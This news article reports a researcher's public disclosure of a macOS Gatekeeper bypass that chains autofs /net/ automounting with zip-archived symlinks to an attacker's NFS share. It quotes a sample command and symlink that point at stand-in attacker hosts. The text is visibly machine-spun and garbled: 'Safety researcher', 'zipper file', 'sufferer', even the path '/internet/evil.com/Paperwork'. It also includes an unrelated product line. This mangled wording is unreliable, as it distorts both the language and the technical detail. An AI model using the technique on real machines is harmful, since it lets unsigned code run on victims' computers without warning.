Researcher exposes vulnerability in macOS Gatekeeper security mechanism
Safety researcher Filippo Cavallarin has publicized what he says is a strategy to bypass the Gatekeeper safety performance of macOS. The bypass stays unaddressed by Apple as of final week’s macOS 10.14.5 launch.
Sylvania HomeKit Mild Strip
Gatekeeper is a macOS safety instrument that verifies functions instantly after they’re downloaded. This prevents functions from being run with out consumer consent. When a consumer downloads an app from exterior of the Mac App Retailer, Gatekeeper is used to verify that the code has been signed by Apple. If the code has not been signed, the app gained’t open with out the consumer giving direct permission.
Cavallarin writes on his blog, nonetheless, that Gatekeeper’s performance will be fully bypassed. In its present implementation, Gatekeeper considers each exterior drives and community shares as “safe locations.” Because of this it permits any utility contained in these areas to run with out checking the code once more. He goes on to elucidate the consumer can “easily” be tricked into mounting community share drive, and that something in that folder can then go Gatekeeper.
The safety researcher explains:
The primary legit characteristic is automount (aka autofs) that permits a consumer to routinely mount a community share simply by accessing a “special” path, on this case, any path starting with “/net/”.
For instance ‘ls /net/evil-attacker.com/sharedfolder/’ will make the os learn the content material of the ‘sharedfolder’ on the distant host (evil-attacker.com) utilizing NFS.
The second legit characteristic is that zip archives can include symbolic hyperlinks pointing to an arbitrary location (together with automount enpoints) and that the software program on MacOS that’s responsable to decompress zip information don’t carry out any verify on the symlinks earlier than creatig them.
An instance of how this may work:
To higher perceive how this exploit works, let’s think about the next situation:
An attacker crafts a zipper file containing a symbolic hyperlink to an automount endpoint she/he controls (ex Paperwork -> /internet/evil.com/Paperwork) and sends it to the sufferer.
The sufferer downloads the malicious archive, extracts it and follows the symlink.
Now the sufferer is in a location managed by the attacker however trusted by Gatekeeper, so any attacker-controlled executable will be run with none warning. The best way Finder is designed (ex cover .app extensions, cover full path from titlebar) makes this tecnique very efficient and onerous to identify.
Cavallarin says that he knowledgeable Apple of this flaw on February 22nd, and that the corporate was supposed to handle it with the release of macOS 10.14.5 last week. As of that launch, nonetheless, the loophole stays unaddressed and Cavallarin says Apple has stopped responding to his emails. He’s publicizing the flaw at this time because the 90-day window he gave Apple has lasped.
Watch a video demonstration of the flaw under: